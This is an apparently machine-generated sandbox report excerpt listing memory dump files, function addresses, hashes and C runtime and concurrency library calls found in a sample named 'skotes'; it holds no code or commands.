                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 893951542-0
                                                                                                                                                                    • Opcode ID: 771abe0efa64a0f461c17396955bc87a7d2b9940af50cf2c8a9aa38ffd0692c9
                                                                                                                                                                    • Instruction ID: a192844bb6f747c12d8aa02dfc28b105d52edfb2425aec39e7204657e260e66a
                                                                                                                                                                    • Opcode Fuzzy Hash: 771abe0efa64a0f461c17396955bc87a7d2b9940af50cf2c8a9aa38ffd0692c9
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C312636B006109FDF159F20D881EADB7B7AF89710F184279E9069B395DF70AD058BD0
                                                                                                                                                                    Function 00632CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00632D0F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3433162309-0
                                                                                                                                                                    • Opcode ID: b0b37a88a12f01f4fd0255ceaae950f2aa9c2efcf493cd5520580a082b1e6ca3
                                                                                                                                                                    • Instruction ID: a41459145a664fefab0a4bde46de949f8852466ef4ed48d889fc43275456de0e
                                                                                                                                                                    • Opcode Fuzzy Hash: b0b37a88a12f01f4fd0255ceaae950f2aa9c2efcf493cd5520580a082b1e6ca3
                                                                                                                                                                    • Instruction Fuzzy Hash: 9A313875A0030ADFCF10DF94C8A0AAEBBBABF44710F1404AAD941AB346D770A945DBE0
                                                                                                                                                                    Function 006413F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 006413FC
                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00641447
                                                                                                                                                                    • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0064147A
                                                                                                                                                                    • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0064152A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2092016602-0
                                                                                                                                                                    • Opcode ID: 0b6dcc2f393752050b43de7ab4557a36653d369aa13a65a43f9a3f333c236a5c
                                                                                                                                                                    • Instruction ID: 8d336b3074756dc0d65c6025585cdccb15b0674b23717f7fe1dc610556b96772
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b6dcc2f393752050b43de7ab4557a36653d369aa13a65a43f9a3f333c236a5c
                                                                                                                                                                    • Instruction Fuzzy Hash: B0316071E006159BCF54DFA8C4915EDFBF7BF49710B14822DE416AB391CB34AA81CB94
                                                                                                                                                                    Function 0062BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                    • Opcode ID: 4c1f480c1c024b2867266dd2b8aa29b32d3dbc618c0f37f5eabec24eddf8aa43
                                                                                                                                                                    • Instruction ID: 544551bdc226d239f300b9b3947630fadadfc86e669365350b3237f1a9ad1a81
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c1f480c1c024b2867266dd2b8aa29b32d3dbc618c0f37f5eabec24eddf8aa43
                                                                                                                                                                    • Instruction Fuzzy Hash: E9213271A00529AFDF40EFA4ED819BEB7BAEF08720F101029F901B7251DB709D419FA4
                                                                                                                                                                    Function 00639C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00639C9C
                                                                                                                                                                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00639CE8
                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00639CFE
                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00639D6A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
